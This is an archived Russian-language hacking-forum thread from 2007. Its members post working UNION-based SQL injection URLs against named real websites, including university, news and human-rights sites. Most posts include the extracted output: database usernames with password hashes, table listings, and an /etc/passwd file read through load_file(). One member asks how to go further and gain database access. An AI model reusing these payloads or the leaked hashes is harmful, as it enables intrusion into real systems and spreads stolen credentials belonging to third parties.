ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.07.2007, 16:51
Аватар для Dr.Frank
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

http://www.devmaster.net/ - сайт программеров... =(

http://www.devmaster.net/articles.php?catID=-6+union+select+1,convert(concat(user(),0x3a,databa se(),0x3a,version())+using+latin1)/*


}{.3. 4e:
http://www.sev.com.au/news.php?articleid=-3608+union+select+1,concat(version(),0x3a,database (),0x3a,user()),3,4,5,6,7,8,9,10,11,12


Human Rights Resource Center:
http://www.hrusa.org/field/listings.php?catid=-2+union+select+concat(version(),0x3a,database(),0x 3a,user(),0x3a,name,0x3a,password),2,3,4+from+user s/*
admin:59395e208ea9aa41f94f1cfabe62dcad

iPod? =)))))))
http://www.ipoding.com/index.php?catid=-11+union+select+1,2,3,4,5,6,7,concat(version(),0x3 a,database(),0x3a,user()),9,10,11,12,13,14,15,16,1 7,18,19,20,21/*

Последний раз редактировалось Dr.Frank; 15.07.2007 в 17:51..
 
Ответить с цитированием

  #2  
Старый 15.07.2007, 23:37
Аватар для Extremal
Extremal
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743

Репутация: 222
Отправить сообщение для Extremal с помощью ICQ
По умолчанию

Код:
http://megaload.megalan.tv/catalog.php?id=-1+union+select+1,concat_ws(0x3a,login,psw)+from+megaload_auth+limit+0,1/*
Код:
http://dj.chem.msu.ru/person.php?id=-165+union+select+1,2,3,concat_ws(0x3a,login,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+users/*

Последний раз редактировалось Extremal; 16.07.2007 в 01:37..
 
Ответить с цитированием

  #3  
Старый 15.07.2007, 23:43
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

http://www.hairstudio.ro/sex.php?id=-5+union+select+1,count(table_name),user(),4+from+i nformation_schema.tables/*
user=\
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #4  
Старый 16.07.2007, 02:14
Аватар для ENFIX
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию

Duke News =\
Код:
http://www.dukemednews.duke.edu/news/article.php?id=-9583+UNION+SELECT+user(),2,version(),4,database(),concat(user,0x3a,password),7,8+from+mysql.user/*
root:623460e26f081bbc
web:761b2fc844890384
mnogosearch:0547d8b07eba42f3
=\
 
Ответить с цитированием

  #5  
Старый 16.07.2007, 02:38
Аватар для ~!DoK_tOR!~
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

=\\

Цитата:
http://hostingwolf.com/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E,email,0x3a,password),6,7,8 ,9,10,0x223E3C212D2D,12,13/**/from/**/links/*
email+password
 
Ответить с цитированием

  #6  
Старый 16.07.2007, 02:52
Аватар для ENFIX
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию

David Levine's Economic and Game Theory Page =\
Код:
http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,version(),0x3a,database()),12,13/*
http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,concat(user,0x3a,password),12,13+from+mysql.user/*
http://levine.sscnet.ucla.edu/workshops/oldnew.php?perm=-430547000000000003+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.tables/*

root:7cf9857402f566aa
design:7cf9857402f566aa
replicate:7cf9857402f566aa
access:55d97f31500ff4ea
levucla:6de799125318a5b4
xjfllehhq208951:57efde0a663a5956
xfjklmghq188885:0bb7efbf598cc88a
xbiffikhq542373:72d927ea51170e2b
xgbffgkhq522308:3d012a8c0201b3b8
 
Ответить с цитированием

  #7  
Старый 16.07.2007, 04:34
Аватар для tbody
tbody
Новичок
Регистрация: 07.07.2007
Сообщений: 21
Провел на форуме:
95348

Репутация: 1
Отправить сообщение для tbody с помощью ICQ
По умолчанию

http://www.eyeforpharma.com/index.asp?ch2=174+and+1=(select+top+1+table_name+f rom+information_schema.tables+where+table_name+not +in+('SubscriberContent_XREF','SUBSCRIBERS','SUBSC RIBERS_XREF','vwTravel_Contact','SubscribersBusine ss_XREF','surround','SurveyAnswers','AeroUpload',' AllArticles_DisplayTime_View','AREAS','AREAS_CHANN ELS_XREF','AREASCHANNELSVIEW','Author_Profile','AU THORS','authors_xref','AutoPrintSubs','AutoRespons e','board','CATEGORY','CATEGORY_SUBCATEGORY_XREF', 'Channel_Article_View','CHANNEL_XREF','CHANNEL1_2_ MENULINK','CHANNEL2_XREF','CHANNEL3_XREF','CHANNEL S','CHANNELS2','CHANNELS3','COMMENTS','COMPANY','C ounters','DailyNewsPopup','delegate_details','dele gates','dir_temp','DIRECTORY','DIRECTORY_CATEGORY_ XREF','DIRECTORY_old','DIRECTORY_SHAREPRICE_XREF', 'DIRECTORY_SUBCATEGORY_XREF','directoryxls','discu ssion_delegates','DNES3_Config','DNES3_Mode3','DNE Server_Config','dtproperties','Ebusiness','EMailAr ticleUsers','ENERGYEVENTS','EVENT','EVENTS','EXHIB ITING','Expo','featuredContent','FeaturedContent2' ,'feedback','FifteenWords','FrontPage_LocationMatr ix','FrontPage_Services','Gerry_temp','ICDirectory XPort','ICExportView','INDUSTRY','JOBS','JOBSBOARD ','JOBSCOMPANIES','MarketsExchanges_NewsFeedOut_Vi ew','MCONNECT','messages','MforMobileNewsletter_Ch annelExtract','news','Newsletter','Newsletter_Clip s_Comment_View','Newsletter_ClipsComments','Newsle tter_ClipsComments_Channel','Newsletter_ClipsComme nts_XREF','Newsletter_MeetPress','Newsletter_MeetP ress_View','Newsletter_Reports_View','Newsletter_R eports_XREF','Newsletter_Responder','NewsletterArc hiveFiles','OnlineMagazines','OPENING','PANEL','PA NELSPEAKERS','PASSWORD','PERSON','PRESENTATION','p resentations','PRESENTER','PublishedNewsletters_Re ports_View','RECRUITMEN','RECRUITMENT','REGISTER', 'relatedstories','REPORT','REPORT_AREAS_XREF','Rep ort_Content_View','REPORT_DISPLAY','REPORT_POLL_XR EF','REPORT_SUBCHANNEL_XREF','REPORT_TRANSLATIONS_ XREF','ReportCompanies_XREF','ReportLinkedCompanie s','Reports_By_Author_View','Resource_Articles','R esults','RESUMES','SendToFriendAddresses','SHAREPR ICE','SHARES_DIRECTORY','SHARESTEMP','Sheet1$','Sh eet2$','Sheet3$','Sht','Siwebtmp','STATS','STATS_R EFERER','Stream','SUBCATEGORY','SUBCHANNEL_XREF',' SUBCHANNELS','SurveyQuestion','sysconstraints','sy ssegments','t_jiaozhu','tbl_IPCapture','tbl_Visito r','tblAerospaceMembers','tblAuto_Contact_Details' ,'tblAuto_Response_Category','tblAuto_Response_Con ference','tblAuto_Response_Conferences','tblAuto_R esponse_Counter','tblAuto_X_REF','tblDirCategories ','tblDirCompanies','tblDirCompanyCategoryXref','t blDirCompanyCustomerXref','tblDirCompanyPartnerXre f','tblDirWebsite','tblEmail_Wizard','tblMobile_De legates','tblPharma_Contact_Details','tblPharma_PP _Details','tblPharma_Response_Category','tblPharma _Response_Conferences','tblPharma_Response_Counter ','tblPharma_Subscriber','tblPharma_X_REF','tblTra nsport_Contact_Details','tblTransport_Response_Cat egory','tblTransport_Response_Counter','tblTranspo rt_X_REF','tblTravel_Contact','tblTravel_Contact_D etails','tblTravel_Contact_PostEvent','tblTravel_C ontact_PostEvent2005backup','tblTravel_Contact2005 backup','tblTravel_ContactMessage','tblTravel_Cont actMessage2005backup','tblTravel_Country','tblTrav el_Event','tblTravel_Response_Category','tblTravel _Response_Conferences','tblTravel_Response_Counter ','tblTravel_User','tblTravel_User_Event','tblTrav el_X_REF','Telematic','toplevel','toplevel','tpplo POLL_OPTIONS','tpplqPOLL_QUESTIONS','tpplrPOLL_RES ULTS','TRANSLATION','TRANSLATIONS','transport_xml_ feed_view','transportsubscribers','TRAVEL%20SEMINA R%20LIST','travel_delegates','travel_events','trav el_events_xref','travel_messages','TravelRHS','tvp 1CHANNEL','tvtp5CHANNEL','VENUE','view_AutoDailyPe rsonalised','VisitorLogins','Visitors','vw_DailyMa ilerSubscribers','WAP','WebsiteComment','xref_Subs criberVisitor','xx-DIRECTORY1','xx-DIRECTORY-2','xx-DIRECTORY-latest','xx-DIRECTORY-olddb'))--


Ebusiness (id, FirstName, LastName, Company, Position, Address1, Address2, State, Zip, Country, Telephone, Fax, Email, Occupation, Newsletter, WeeklyWrap, MoreInfo, MoreInfo2)

EMailArticleUsers

OnlineMagazines (id, Published, industry, IssueNo, Description, Link, Img, Counter)

PASSWORD (PERSONCODE, EVENTCODE, CHECKED)
 
Ответить с цитированием

  #8  
Старый 16.07.2007, 11:57
Аватар для V1p-eR
V1p-eR
Познающий
Регистрация: 02.07.2007
Сообщений: 34
Провел на форуме:
446543

Репутация: 29
По умолчанию

Код:
http://edu.direktor.ru/lib/author.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6/*
Код:
http://edu-net.khb.ru/index.php?page=news&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8/*
 
Ответить с цитированием

  #9  
Старый 16.07.2007, 18:08
Аватар для dudits
dudits
Banned
Регистрация: 02.06.2007
Сообщений: 42
Провел на форуме:
263861

Репутация: 6
По умолчанию

http://info.l2r.ru/?part=items&id=1+or+1=@@version--

может кто подсказать что дальше делать, чтобы получить доступ к бд сайта? что то не получается у меня
 
Ответить с цитированием

  #10  
Старый 16.07.2007, 18:20
Аватар для ENFIX
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию

Princeton University Program for Law and Public Affairs
Цитата:
http://lapa.princeton.edu/peopledetail.php?ID=-507+UNION+SELECT+1,2,3,4,5,concat(version(),0x3a,u ser(),0x3a,database()),7,8,9,10,11,12,13,14,15,16, 17,16,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39/*

http://lapa.princeton.edu/peopledetail.php?ID=-507+UNION+SELECT+1,2,3,4,5,concat(user,0x3a,passwo rd),7,8,9,10,11,12,13,14,15,16,17,16,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+ from+mysql.user/*
root:*74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3

"/etc/passwd"
Цитата:
http://lapa.princeton.edu/peopledetail.php?ID=-507+UNION+SELECT+1,2,3,4,5,load_file(0x2F6574632F7 06173737764),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39/*
Код:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/openpkg/lib/openpkg/bash
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mysql:x:27:351:MySQL Server:/var/lib/mysql:/bin/bash
openpkg:x:42000:42000:/openpkg OpenPKG (management):/openpkg:/openpkg/lib/openpkg/bash
openpkg-r:x:42001:42001:/openpkg OpenPKG (restricted):/openpkg:/openpkg/lib/openpkg/bash
openpkg-n:x:42002:42002:/openpkg OpenPKG (non-privileged):/openpkg:/openpkg/lib/openpkg/bash
csgweb:x:61400:36::/home/csgweb:/bin/bash
+agvols::0:0:::
+facphoto::0:0::/var/local/as/home/facphoto:
+puombuds::0:0:::
+crosley::0:0:::
+daveh::0:0:::
+fleming::0:0:::
+nmcstaff::0:0:::
+oitdas::0:0:::
+pucap::0:0:::
+serge::0:0:::
+stevea::0:0:::
+fausey::0:0:::
+albin::0:0::/var/local/as/home/albin:
+agvols::0:0::/var/local/as/home/agvols:
+officehr::0:0::/u/officehr:
+mdmuzzie::0:0::/u/mdmuzzie:
+acla06::0:0::/u/acla06:
+genpurch::0:0::/u/genpurch:
+uait::0:0::/var/local/as/home/uait:
+pia::0:0::/u/pia:
+tafsir::0:0::/u/tafsir:
+transreg::0:0::/u/transreg:
+afrstds::0:0::/u/afrstds:
+restudy::0:0::/u/restudy:
+odc::0:0::/u/odc:
+jkchu::0:0::/u/jkchu:
+newmedia::0:0::/u/newmedia:
+ims::0:0::/var/local/as/home/ims:
+eeweb::0:0::/var/local/as/home/eeweb:
+eewebs::0:0::/var/local/as/home/eewebs:
+philosph::0:0::/var/local/as
Httpd.conf
Цитата:
http://lapa.princeton.edu/peopledetail.php?ID=-507+UNION+SELECT+1,2,3,4,5,load_file(0x2F6574632F6 8747470642F636F6E662F68747470642E636F6E66),7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ